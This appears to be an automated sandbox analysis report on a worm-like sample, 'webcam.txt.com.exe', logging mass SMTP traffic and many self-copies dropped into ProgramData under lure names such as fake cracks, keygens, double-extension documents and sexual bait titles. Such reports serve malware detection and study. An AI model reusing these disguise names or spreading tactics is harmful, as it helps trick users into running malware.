Source: webcam.txt.com.exe, 00000000.00000003.3133044573.0000000000545000.00000004.00000020.00020000.00000000.sdmp, webcam.txt.com.exe, 00000000.00000003.3136511757.0000000000545000.00000004.00000020.00020000.00000000.sdmp, webcam.txt.com.exe, 00000000.00000002.4112709818.0000000000545000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ads.msn.com/
Source: webcam.txt.com.exe, 00000000.00000003.1943099224.0000000002F21000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/
Source: webcam.txt.com.exe, 00000000.00000002.4112381428.0000000000500000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/jakearchibald/es6-promise/master/license
Source: webcam.txt.com.exe, 00000000.00000002.4114021770.0000000002F20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://spdx.org/licenses/mit.html)
Source: webcam.txt.com.exe, 00000000.00000002.4112381428.0000000000500000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/92c234f1-dc91-4dc1-925d-6c90fc3816d8
Source: webcam.txt.com.exe, 00000000.00000003.3133044573.0000000000545000.00000004.00000020.00020000.00000000.sdmp, webcam.txt.com.exe, 00000000.00000003.3136511757.0000000000545000.00000004.00000020.00020000.00000000.sdmp, webcam.txt.com.exe, 00000000.00000002.4112709818.0000000000545000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://videoadssdk.azurewebsites.net/api/vpaid?code=ormoexb1ssje12klg/9jqrbzzm42xq/dp1abfowaq7tvzd4

Spam, unwanted Advertisements and Ransom Demands

barindex
Source: SMTPNetwork traffic detected: Mail traffic on many different IPs 18

System Summary

barindex
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: c:\documents and settings\all users\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\usoshared\Microsoft WinXP Crack.exeJump to behavior
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\ProgramData\USOShared\Microsoft WinXP Crack.exe\:Zone.Identifier:$DATAJump to behavior
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: c:\documents and settings\all users\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\usoshared\Keygen 4 all appz.exeJump to behavior
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\ProgramData\USOShared\Keygen 4 all appz.exe\:Zone.Identifier:$DATAJump to behavior
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: c:\documents and settings\all users\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\usoshared\Cracks & Warez Archive.exeJump to behavior
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\ProgramData\USOShared\Cracks & Warez Archive.exe\:Zone.Identifier:$DATAJump to behavior
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: c:\documents and settings\all users\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\usoshared\Ulead Keygen.exeJump to behavior
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\ProgramData\USOShared\Ulead Keygen.exe\:Zone.Identifier:$DATAJump to behavior
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: c:\documents and settings\all users\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\usoshared\The Sims 3 crack.exeJump to behavior
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\ProgramData\USOShared\The Sims 3 crack.exe\:Zone.Identifier:$DATAJump to behavior
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: c:\documents and settings\all users\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\usoshared\logs\Keygen 4 all appz.exeJump to behavior
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\ProgramData\USOShared\Logs\Keygen 4 all appz.exe\:Zone.Identifier:$DATAJump to behavior
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: c:\documents and settings\all users\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\usoshared\logs\Ulead Keygen.exeJump to behavior
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\ProgramData\USOShared\Logs\Ulead Keygen.exe\:Zone.Identifier:$DATAJump to behavior
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: c:\documents and settings\all users\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\usoshared\logs\The Sims 3 crack.exeJump to behavior
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\ProgramData\USOShared\Logs\The Sims 3 crack.exe\:Zone.Identifier:$DATAJump to behavior
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: c:\documents and settings\all users\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\usoshared\logs\user\Ulead Keygen.exeJump to behavior
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\ProgramData\USOShared\Logs\User\Ulead Keygen.exe\:Zone.Identifier:$DATAJump to behavior
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\ProgramData\USOShared\Microsoft WinXP Crack.exe\:Zone.Identifier:$DATAJump to behavior
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: c:\documents and settings\all users\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\usoshared\Microsoft Office 2003 Crack.exeJump to behavior
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\ProgramData\USOShared\Microsoft Office 2003 Crack.exe\:Zone.Identifier:$DATAJump to behavior
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\ProgramData\USOShared\Keygen 4 all appz.exe\:Zone.Identifier:$DATAJump to behavior
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: c:\documents and settings\all users\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\usoshared\Visual Studio Net Crack.exeJump to behavior
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\ProgramData\USOShared\Visual Studio Net Crack.exe\:Zone.Identifier:$DATAJump to behavior
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\ProgramData\USOShared\Cracks & Warez Archive.exe\:Zone.Identifier:$DATAJump to behavior
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\ProgramData\USOShared\Ulead Keygen.exe\:Zone.Identifier:$DATAJump to behavior
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\ProgramData\USOShared\The Sims 3 crack.exe\:Zone.Identifier:$DATAJump to behavior
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: c:\documents and settings\all users\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\usoshared\logs\Microsoft WinXP Crack.exeJump to behavior
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\ProgramData\USOShared\Logs\Microsoft WinXP Crack.exe\:Zone.Identifier:$DATAJump to behavior
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: c:\documents and settings\all users\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\usoshared\logs\Microsoft Office 2003 Crack.exeJump to behavior
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\ProgramData\USOShared\Logs\Microsoft Office 2003 Crack.exe\:Zone.Identifier:$DATAJump to behavior
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\ProgramData\USOShared\Logs\Keygen 4 all appz.exe\:Zone.Identifier:$DATAJump to behavior
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: c:\documents and settings\all users\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\usoshared\logs\Visual Studio Net Crack.exeJump to behavior
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\ProgramData\USOShared\Logs\Visual Studio Net Crack.exe\:Zone.Identifier:$DATAJump to behavior
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: c:\documents and settings\all users\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\usoshared\logs\Cracks & Warez Archive.exeJump to behavior
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\ProgramData\USOShared\Logs\Cracks & Warez Archive.exe\:Zone.Identifier:$DATAJump to behavior
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\ProgramData\USOShared\Logs\Ulead Keygen.exe\:Zone.Identifier:$DATAJump to behavior
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\ProgramData\USOShared\Logs\The Sims 3 crack.exe\:Zone.Identifier:$DATAJump to behavior
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: c:\documents and settings\all users\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\usoshared\logs\user\Microsoft WinXP Crack.exeJump to behavior
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\ProgramData\USOShared\Logs\User\Microsoft WinXP Crack.exe\:Zone.Identifier:$DATAJump to behavior
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: c:\documents and settings\all users\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\usoshared\logs\user\Microsoft Office 2003 Crack.exeJump to behavior
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\ProgramData\USOShared\Logs\User\Microsoft Office 2003 Crack.exe\:Zone.Identifier:$DATAJump to behavior
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: c:\documents and settings\all users\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\usoshared\logs\user\Keygen 4 all appz.exeJump to behavior
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\ProgramData\USOShared\Logs\User\Keygen 4 all appz.exe\:Zone.Identifier:$DATAJump to behavior
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: c:\documents and settings\all users\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\usoshared\logs\user\Visual Studio Net Crack.exeJump to behavior
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\ProgramData\USOShared\Logs\User\Visual Studio Net Crack.exe\:Zone.Identifier:$DATAJump to behavior
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: c:\documents and settings\all users\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\usoshared\logs\user\Cracks & Warez Archive.exeJump to behavior
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\ProgramData\USOShared\Logs\User\Cracks & Warez Archive.exe\:Zone.Identifier:$DATAJump to behavior
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\ProgramData\USOShared\Logs\User\Ulead Keygen.exe\:Zone.Identifier:$DATAJump to behavior
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: c:\documents and settings\all users\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\usoshared\logs\user\The Sims 3 crack.exeJump to behavior
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\ProgramData\USOShared\Logs\User\The Sims 3 crack.exe\:Zone.Identifier:$DATAJump to behavior
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\ProgramData\USOShared\Microsoft WinXP Crack.exe\:Zone.Identifier:$DATAJump to behavior
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\ProgramData\USOShared\Microsoft Office 2003 Crack.exe\:Zone.Identifier:$DATAJump to behavior
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\ProgramData\USOShared\Keygen 4 all appz.exe\:Zone.Identifier:$DATAJump to behavior
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\ProgramData\USOShared\Visual Studio Net Crack.exe\:Zone.Identifier:$DATAJump to behavior
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\ProgramData\USOShared\Cracks & Warez Archive.exe\:Zone.Identifier:$DATAJump to behavior
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\ProgramData\USOShared\Ulead Keygen.exe\:Zone.Identifier:$DATAJump to behavior
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\ProgramData\USOShared\The Sims 3 crack.exe\:Zone.Identifier:$DATAJump to behavior
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\ProgramData\USOShared\Logs\Microsoft WinXP Crack.exe\:Zone.Identifier:$DATAJump to behavior
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\ProgramData\USOShared\Logs\Microsoft Office 2003 Crack.exe\:Zone.Identifier:$DATAJump to behavior
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\ProgramData\USOShared\Logs\Keygen 4 all appz.exe\:Zone.Identifier:$DATAJump to behavior
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\ProgramData\USOShared\Logs\Visual Studio Net Crack.exe\:Zone.Identifier:$DATAJump to behavior
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\ProgramData\USOShared\Logs\Cracks & Warez Archive.exe\:Zone.Identifier:$DATAJump to behavior
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\ProgramData\USOShared\Logs\Ulead Keygen.exe\:Zone.Identifier:$DATAJump to behavior
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\ProgramData\USOShared\Logs\The Sims 3 crack.exe\:Zone.Identifier:$DATAJump to behavior
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\ProgramData\USOShared\Logs\User\Microsoft WinXP Crack.exe\:Zone.Identifier:$DATAJump to behavior
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\ProgramData\USOShared\Logs\User\Microsoft Office 2003 Crack.exe\:Zone.Identifier:$DATAJump to behavior
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\ProgramData\USOShared\Logs\User\Keygen 4 all appz.exe\:Zone.Identifier:$DATAJump to behavior
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\ProgramData\USOShared\Logs\User\Visual Studio Net Crack.exe\:Zone.Identifier:$DATAJump to behavior
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\ProgramData\USOShared\Logs\User\Cracks & Warez Archive.exe\:Zone.Identifier:$DATAJump to behavior
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\ProgramData\USOShared\Logs\User\Ulead Keygen.exe\:Zone.Identifier:$DATAJump to behavior
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\ProgramData\USOShared\Logs\User\The Sims 3 crack.exe\:Zone.Identifier:$DATAJump to behavior
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\ProgramData\USOShared\Microsoft WinXP Crack.exe\:Zone.Identifier:$DATAJump to behavior
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\ProgramData\USOShared\Microsoft Office 2003 Crack.exe\:Zone.Identifier:$DATAJump to behavior
Source: C:\Users\user\Desktop\webcam.txt.com.exeFile created: C:\ProgramData\USOShared\Keygen 4 all appz.exe\:Zone.Identifier:$DATAJump to behavior
Source: webcam.txt.com.exeStatic PE information: section name:
Source: webcam.txt.com.exeStatic PE information: section name:
Source: Ahead Nero 7.exe.0.drStatic PE information: section name:
Source: Ahead Nero 7.exe.0.drStatic PE information: section name:
Source: Microsoft Office 2003 Crack.exe.0.drStatic PE information: section name:
Source: Microsoft Office 2003 Crack.exe.0.drStatic PE information: section name:
Source: Teen Porn 16.jpg.pif.0.drStatic PE information: section name:
Source: Teen Porn 16.jpg.pif.0.drStatic PE information: section name:
Source: XXX hardcore pic.jpg.exe.0.drStatic PE information: section name:
Source: XXX hardcore pic.jpg.exe.0.drStatic PE information: section name:
Source: Microsoft WinXP Crack.exe.0.drStatic PE information: section name:
Source: Microsoft WinXP Crack.exe.0.drStatic PE information: section name:
Source: The Sims 3 crack.exe.0.drStatic PE information: section name:
Source: The Sims 3 crack.exe.0.drStatic PE information: section name:
Source: Lightwave SE Update.exe.0.drStatic PE information: section name:
Source: Lightwave SE Update.exe.0.drStatic PE information: section name:
Source: Adobe Photoshop 9 full.exe.0.drStatic PE information: section name:
Source: Adobe Photoshop 9 full.exe.0.drStatic PE information: section name:
Source: Microsoft Office 2003 Crack.exe0.0.drStatic PE information: section name:
Source: Microsoft Office 2003 Crack.exe0.0.drStatic PE information: section name:
Source: Serials.txt.exe.0.drStatic PE information: section name:
Source: Serials.txt.exe.0.drStatic PE information: section name:
Source: Adobe Premiere 9.exe.0.drStatic PE information: section name:
Source: Adobe Premiere 9.exe.0.drStatic PE information: section name:
Source: Dark Angels.pif.0.drStatic PE information: section name:
Source: Dark Angels.pif.0.drStatic PE information: section name:
Source: Full album.mp3.pif.0.drStatic PE information: section name:
Source: Full album.mp3.pif.0.drStatic PE information: section name:
Source: Learn Programming.doc.exe.0.drStatic PE information: section name:
Source: Learn Programming.doc.exe.0.drStatic PE information: section name:
Source: WinXP eBook.doc.exe.0.drStatic PE information: section name:
Source: WinXP eBook.doc.exe.0.drStatic PE information: section name:
Source: Microsoft Office 2003 Crack.exe1.0.drStatic PE information: section name:
Source: Microsoft Office 2003 Crack.exe1.0.drStatic PE information: section name:
Source: winlogon.exe.0.drStatic PE information: section name:
Source: winlogon.exe.0.drStatic PE information: section name:
Source: Dark Angels.pif0.0.drStatic PE information: section name:
Source: Dark Angels.pif0.0.drStatic PE information: section name:
Source: Opera.exe.0.drStatic PE information: section name:
Source: Opera.exe.0.drStatic PE information: section name:
Source: Microsoft WinXP Crack.exe0.0.drStatic PE information: section name:
Source: Microsoft WinXP Crack.exe0.0.drStatic PE information: section name:
Source: Teen Porn 16.jpg.pif0.0.drStatic PE information: section name:
Source: Teen Porn 16.jpg.pif0.0.drStatic PE information: section name:
Source: Adobe Photoshop 9 full.exe0.0.drStatic PE information: section name:
Source: Adobe Photoshop 9 full.exe0.0.drStatic PE information: section name:
Source: Adobe Premiere 9.exe0.0.drStatic PE information: section name:
Source: Adobe Premiere 9.exe0.0.drStatic PE information: section name:
Source: Serials.txt.exe0.0.drStatic PE information: section name:
Source: Serials.txt.exe0.0.drStatic PE information: section name:
Source: E-Book Archive.rtf.exe.0.drStatic PE information: section name:
Source: E-Book Archive.rtf.exe.0.drStatic PE information: section name:
Source: Doom 3 Beta.exe.0.drStatic PE information: section name:
Source: Doom 3 Beta.exe.0.drStatic PE information: section name:
Source: Full album.mp3.pif0.0.drStatic PE information: section name:
Source: Full album.mp3.pif0.0.drStatic PE information: section name:
Source: How to hack.doc.exe.0.drStatic PE information: section name:
Source: How to hack.doc.exe.0.drStatic PE information: section name:
Source: XXX hardcore pic.jpg.exe0.0.drStatic PE information: section name:
Source: XXX hardcore pic.jpg.exe0.0.drStatic PE information: section name:
Source: Ahead Nero 7.exe0.0.drStatic PE information: section name:
Source: Ahead Nero 7.exe0.0.drStatic PE information: section name:
Source: 1000 Sex and more.rtf.exe.0.drStatic PE information: section name:
Source: 1000 Sex and more.rtf.exe.0.drStatic PE information: section name:
Source: WinXP eBook.doc.exe0.0.drStatic PE information: section name:
Source: WinXP eBook.doc.exe0.0.drStatic PE information: section name:
Source: 3D Studio Max 3dsmax.exe.0.drStatic PE information: section name:
Source: 3D Studio Max 3dsmax.exe.0.drStatic PE information: section name:
Source: Win Longhorn Beta.exe.0.drStatic PE information: section name:
Source: Win Longhorn Beta.exe.0.drStatic PE information: section name:
Source: Microsoft Office 2003 Crack.exe2.0.drStatic PE information: section name:
Source: Microsoft Office 2003 Crack.exe2.0.drStatic PE information: section name:
Source: Ahead Nero 7.exe1.0.drStatic PE information: section name:
Source: Ahead Nero 7.exe1.0.drStatic PE information: section name:
Source: Full album.mp3.pif1.0.drStatic PE information: section name:
Source: Full album.mp3.pif1.0.drStatic PE information: section name:
Source: Serials.txt.exe1.0.drStatic PE information: section name:
Source: Serials.txt.exe1.0.drStatic PE information: section name:
Source: E-Book Archive.rtf.exe0.0.drStatic PE information: section name:
Source: E-Book Archive.rtf.exe0.0.drStatic PE information: section name:
Source: Win Longhorn Beta.exe0.0.drStatic PE information: section name:
Source: Win Longhorn Beta.exe0.0.drStatic PE information: section name:
Source: Doom 3 Beta.exe0.0.drStatic PE information: section name:
Source: Doom 3 Beta.exe0.0.drStatic PE information: section name:
Source: Dictionary English - France.doc.exe.0.drStatic PE information: section name:
Source: Dictionary English - France.doc.exe.0.drStatic PE information: section name:
Source: How to hack.doc.exe0.0.drStatic PE information: section name:
Source: How to hack.doc.exe0.0.drStatic PE information: section name:
Source: RFC Basics Full Edition.doc.exe.0.drStatic PE information: section name:
Source: RFC Basics Full Edition.doc.exe.0.drStatic PE information: section name:
Source: Learn Programming.doc.exe0.0.drStatic PE information: section name:
Source: Learn Programming.doc.exe0.0.drStatic PE information: section name:
Source: 3D Studio Max 3dsmax.exe0.0.drStatic PE information: section name:
Source: 3D Studio Max 3dsmax.exe0.0.drStatic PE information: section name:
Source: Keygen 4 all appz.exe.0.drStatic PE information: section name:
Source: Keygen 4 all appz.exe.0.drStatic PE information: section name:
Source: Win Longhorn Beta.exe1.0.drStatic PE information: section name:
Source: Win Longhorn Beta.exe1.0.drStatic PE information: section name:
Source: WinXP eBook.doc.exe1.0.drStatic PE information: section name:
Source: WinXP eBook.doc.exe1.0.drStatic PE information: section name:
Source: Ahead Nero 7.exe2.0.drStatic PE information: section name:
Source: Ahead Nero 7.exe2.0.drStatic PE information: section name:
Source: Learn Programming.doc.exe1.0.drStatic PE information: section name:
Source: Learn Programming.doc.exe1.0.drStatic PE information: section name:
Source: Full album.mp3.pif2.0.drStatic PE information: section name:
Source: Full album.mp3.pif2.0.drStatic PE information: section name:
Source: How to hack.doc.exe1.0.drStatic PE information: section name:
Source: How to hack.doc.exe1.0.drStatic PE information: section name:
Source: Doom 3 Beta.exe1.0.drStatic PE information: section name:
Source: Doom 3 Beta.exe1.0.drStatic PE information: section name:
Source: Serials.txt.exe2.0.drStatic PE information: section name:
Source: Serials.txt.exe2.0.drStatic PE information: section name:
Source: E-Book Archive.rtf.exe1.0.drStatic PE information: section name:
Source: E-Book Archive.rtf.exe1.0.drStatic PE information: section name:
Source: Keygen 4 all appz.exe0.0.drStatic PE information: section name:
Source: Keygen 4 all appz.exe0.0.drStatic PE information: section name:
Source: Dictionary English - France.doc.exe0.0.drStatic PE information: section name:
Source: Dictionary English - France.doc.exe0.0.drStatic PE information: section name:
Source: Windows Sourcecode.doc.exe.0.drStatic PE information: section name:
Source: Windows Sourcecode.doc.exe.0.drStatic PE information: section name:
Source: RFC Basics Full Edition.doc.exe0.0.drStatic PE information: section name:
Source: RFC Basics Full Edition.doc.exe0.0.drStatic PE information: section name:
Source: Norton Antivirus 2004.exe.0.drStatic PE information: section name:
Source: Norton Antivirus 2004.exe.0.drStatic PE information: section name:
Source: 1000 Sex and more.rtf.exe0.0.drStatic PE information: section name:
Source: 1000 Sex and more.rtf.exe0.0.drStatic PE information: section name:
Source: Partitionsmagic 9.0.exe.0.drStatic PE information: section name:
Source: Partitionsmagic 9.0.exe.0.drStatic PE information: section name:
Source: Star Office 8.exe.0.drStatic PE information: section name:
Source: Star Office 8.exe.0.drStatic PE information: section name:
Source: Magix Video Deluxe 4.exe.0.drStatic PE information: section name:
Source: Magix Video Deluxe 4.exe.0.drStatic PE information: section name:
Source: Win Longhorn Beta.exe2.0.drStatic PE information: section name:
Source: Win Longhorn Beta.exe2.0.drStatic PE information: section name:
Source: Keygen 4 all appz.exe1.0.drStatic PE information: section name:
Source: Keygen 4 all appz.exe1.0.drStatic PE information: section name:
Source: WinXP eBook.doc.exe2.0.drStatic PE information: section name:
Source: WinXP eBook.doc.exe2.0.drStatic PE information: section name:
Source: 3D Studio Max 3dsmax.exe1.0.drStatic PE information: section name:
Source: 3D Studio Max 3dsmax.exe1.0.drStatic PE information: section name:
Source: Learn Programming.doc.exe2.0.drStatic PE information: section name:
Source: Learn Programming.doc.exe2.0.drStatic PE information: section name:
Source: 1000 Sex and more.rtf.exe1.0.drStatic PE information: section name:
Source: 1000 Sex and more.rtf.exe1.0.drStatic PE information: section name:
Source: How to hack.doc.exe2.0.drStatic PE information: section name:
Source: How to hack.doc.exe2.0.drStatic PE information: section name:
Source: RFC Basics Full Edition.doc.exe1.0.drStatic PE information: section name:
Source: RFC Basics Full Edition.doc.exe1.0.drStatic PE information: section name:
Source: Doom 3 Beta.exe2.0.drStatic PE information: section name:
Source: Doom 3 Beta.exe2.0.drStatic PE information: section name:
Source: Dictionary English - France.doc.exe1.0.drStatic PE information: section name:
Source: Dictionary English - France.doc.exe1.0.drStatic PE information: section name:
Source: E-Book Archive.rtf.exe2.0.drStatic PE information: section name:
Source: E-Book Archive.rtf.exe2.0.drStatic PE information: section name:
Source: Windows Sourcecode.doc.exe0.0.drStatic PE information: section name:
Source: Windows Sourcecode.doc.exe0.0.drStatic PE information: section name:
Source: Norton Antivirus 2004.exe0.0.drStatic PE information: section name:
Source: Norton Antivirus 2004.exe0.0.drStatic PE information: section name:
Source: Gimp 1.5 Full with Key.exe.0.drStatic PE information: section name:
Source: Gimp 1.5 Full with Key.exe.0.drStatic PE information: section name:
Source: ACDSee 9.exe.0.drStatic PE information: section name:
Source: ACDSee 9.exe.0.drStatic PE information: section name:
Source: Visual Studio Net Crack.exe.0.drStatic PE information: section name:
Source: Visual Studio Net Crack.exe.0.drStatic PE information: section name:
Source: Cracks & Warez Archive.exe.0.drStatic PE information: section name:
Source: Cracks & Warez Archive.exe.0.drStatic PE information: section name:
Source: Magix Video Deluxe 4.exe0.0.drStatic PE information: section name:
Source: Magix Video Deluxe 4.exe0.0.drStatic PE information: section name:
Source: Keygen 4 all appz.exe2.0.drStatic PE information: section name:
Source: Keygen 4 all appz.exe2.0.drStatic PE information: section name:
Source: Star Office 8.exe0.0.drStatic PE information: section name:
Source: Star Office 8.exe0.0.drStatic PE information: section name:
Source: 3D Studio Max 3dsmax.exe2.0.drStatic PE information: section name:
Source: 3D Studio Max 3dsmax.exe2.0.drStatic PE information: section name:
Source: Partitionsmagic 9.0.exe0.0.drStatic PE information: section name:
Source: Partitionsmagic 9.0.exe0.0.drStatic PE information: section name:
Source: 1000 Sex and more.rtf.exe2.0.drStatic PE information: section name:
Source: 1000 Sex and more.rtf.exe2.0.drStatic PE information: section name:
Source: Gimp 1.5 Full with Key.exe0.0.drStatic PE information: section name:
Source: Gimp 1.5 Full with Key.exe0.0.drStatic PE information: section name:
Source: RFC Basics Full Edition.doc.exe2.0.drStatic PE information: section name:
Source: RFC Basics Full Edition.doc.exe2.0.drStatic PE information: section name:
Source: Norton Antivirus 2004.exe1.0.drStatic PE information: section name:
Source: Norton Antivirus 2004.exe1.0.drStatic PE information: section name:
Source: Dictionary English - France.doc.exe2.0.drStatic PE information: section name:
Source: Dictionary English - France.doc.exe2.0.drStatic PE information: section name:
Source: Windows Sourcecode.doc.exe1.0.drStatic PE information: section name:
Source: Windows Sourcecode.doc.exe1.0.drStatic PE information: section name:
Source: Clone DVD 5.exe.0.drStatic PE information: section name:
Source: Clone DVD 5.exe.0.drStatic PE information: section name:
Source: MS Service Pack 5.exe.0.drStatic PE information: section name:
Source: MS Service Pack 5.exe.0.drStatic PE information: section name:
Source: Magix Video Deluxe 4.exe1.0.drStatic PE information: section name:
Source: Magix Video Deluxe 4.exe1.0.drStatic PE information: section name:
Source: Cracks & Warez Archive.exe0.0.drStatic PE information: section name:
Source: Cracks & Warez Archive.exe0.0.drStatic PE information: section name:
Source: Star Office 8.exe1.0.drStatic PE information: section name:
Source: Star Office 8.exe1.0.drStatic PE information: section name:
Source: Visual Studio Net Crack.exe0.0.drStatic PE information: section name:
Source: Visual Studio Net Crack.exe0.0.drStatic PE information: section name:
Source: Partitionsmagic 9.0.exe1.0.drStatic PE information: section name:
Source: Partitionsmagic 9.0.exe1.0.drStatic PE information: section name:
Source: ACDSee 9.exe0.0.drStatic PE information: section name:
Source: ACDSee 9.exe0.0.drStatic PE information: section name:
Source: Gimp 1.5 Full with Key.exe1.0.drStatic PE information: section name:
Source: Gimp 1.5 Full with Key.exe1.0.drStatic PE information: section name:
Source: MS Service Pack 5.exe0.0.drStatic PE information: section name:
Source: MS Service Pack 5.exe0.0.drStatic PE information: section name:
Source: Norton Antivirus 2004.exe2.0.drStatic PE information: section name:
Source: Norton Antivirus 2004.exe2.0.drStatic PE information: section name:
Source: Clone DVD 5.exe0.0.drStatic PE information: section name:
Source: Clone DVD 5.exe0.0.drStatic PE information: section name:
Source: Windows Sourcecode.doc.exe2.0.drStatic PE information: section name:
Source: Windows Sourcecode.doc.exe2.0.drStatic PE information: section name:
Source: WinAmp 12 full.exe.0.drStatic PE information: section name:
Source: WinAmp 12 full.exe.0.drStatic PE information: section name:
Source: DivX 7.0 final.exe.0.drStatic PE information: section name:
Source: DivX 7.0 final.exe.0.drStatic PE information: section name:
Source: Ulead Keygen.exe.0.drStatic PE information: section name:
Source: Ulead Keygen.exe.0.drStatic PE information: section name:
Source: Cracks & Warez Archive.exe1.0.drStatic PE information: section name:
Source: Cracks & Warez Archive.exe1.0.drStatic PE information: section name:
Source: Smashing the stack.rtf.exe.0.drStatic PE information: section name:
Source: Smashing the stack.rtf.exe.0.drStatic PE information: section name:
Source: Visual Studio Net Crack.exe1.0.drStatic PE information: section name:
Source: Visual Studio Net Crack.exe1.0.drStatic PE information: section name:
Source: IE58.1 full setup.exe.0.drStatic PE information: section name:
Source: IE58.1 full setup.exe.0.drStatic PE information: section name:
Source: ACDSee 9.exe1.0.drStatic PE information: section name:
Source: ACDSee 9.exe1.0.drStatic PE information: section name:
Source: Opera.exe0.0.drStatic PE information: section name:
Source: Opera.exe0.0.drStatic PE information: section name:
Source: MS Service Pack 5.exe1.0.drStatic PE information: section name:
Source: MS Service Pack 5.exe1.0.drStatic PE information: section name:
Source: DivX 7.0 final.exe0.0.drStatic PE information: section name:
